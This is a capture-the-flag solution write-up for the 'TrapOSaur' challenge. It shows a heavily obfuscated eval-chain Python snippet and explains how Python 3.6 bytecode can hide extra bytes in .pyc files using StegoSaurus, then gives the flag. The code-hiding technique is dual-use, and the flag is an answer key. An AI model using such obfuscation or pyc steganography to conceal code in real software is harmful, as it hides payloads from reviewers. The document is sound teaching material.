(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])))+str((all([])+all([])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((all([])+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])+all([])+all([])))+str((+all([])))+')')+'['+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'s'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'e'+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+str((all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((all([])+all([])+all([])+all([])))+str((all([])+all([])+all([])+all([])))+')')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+eval('str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]')+str(str)[(all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+']'+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')')+eval(''+eval('str(str)[+all([])]')+eval('str(str'+eval('str('+str(eval)[eval(str((+all([])))+str((+all([[]]))))]+'l'+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+'at((+all([]))))[(+all([]))]')+str(str)[+all([])]+str(eval)[eval(str((+all([])))+str((all([])+all([])+all([])+all([])+all([])+all([]))))]+str(eval)[(all([])+all([]))]+str(eval)[(all([])+all([])+all([])+all([])+all([])+all([])+all([])+all([]))]+'t)[(all([])+all([])+all([])+all([]))]')+'r('+str((+all([])))+str((+all([[]])))+')') 8 | ``` 9 | 10 | This is basically a pyfuck version of 11 | ``` 12 | \n\ndef f(x):\n x=['s','t','e','g','o']\n\n 13 | ``` 14 | 15 | There is a roulette function as well, but it is useless. As mentioned in CTF, all flag format are 'intact' otherwise mentioned in description. 16 | Hence, any player should not try `flag{stego}` or `stego` it will give wrong answer as expected. But stego is the hint to proceed further. 17 | 18 | Python3.6 bytecode has a pecularity which can be abused to hide extra bytes into without even knowing. In Python <= 3.5 instructions in the bytecode occupied either 1 or 3 bytes, depending on if the opcode took an arugment or not. In Python 3.6 this was changed so that all instructions occupy two bytes. 19 | 20 | Hence, we figure out how many extra bytes could be added in our pyc. There is also implicit hint given in challenge name `TrapOSaur` which indicates to a tool known as `StegoSaurus` 21 | 22 | https://bitbucket.org/jherron/stegosaurus/overview 23 | 24 | After utilizing it, players will receive their hard earned flag : `flag{5t3g0_ftw}` 25 | 26 | We expect players to dig up through the difference between python versions. It's very minor but this challenge has huge relevance in *real world scenario*, as any Malware can basically hide shellcode inside a pyc file & extract it. Hence, the description either you use your hard earned leet skills indefinetly to reverse or either you think deep ;) 27 | -------------------------------------------------------------------------------- /TrapOSaur/misc03.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/TrapOSaur/misc03.pyc -------------------------------------------------------------------------------- /TrapOSaur/solution/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aadityapurani/My-CTF-Challenges/26fedac88ca647fef197ff62c6169534a10811cd/TrapOSaur/solution/README.md --------------------------------------------------------------------------------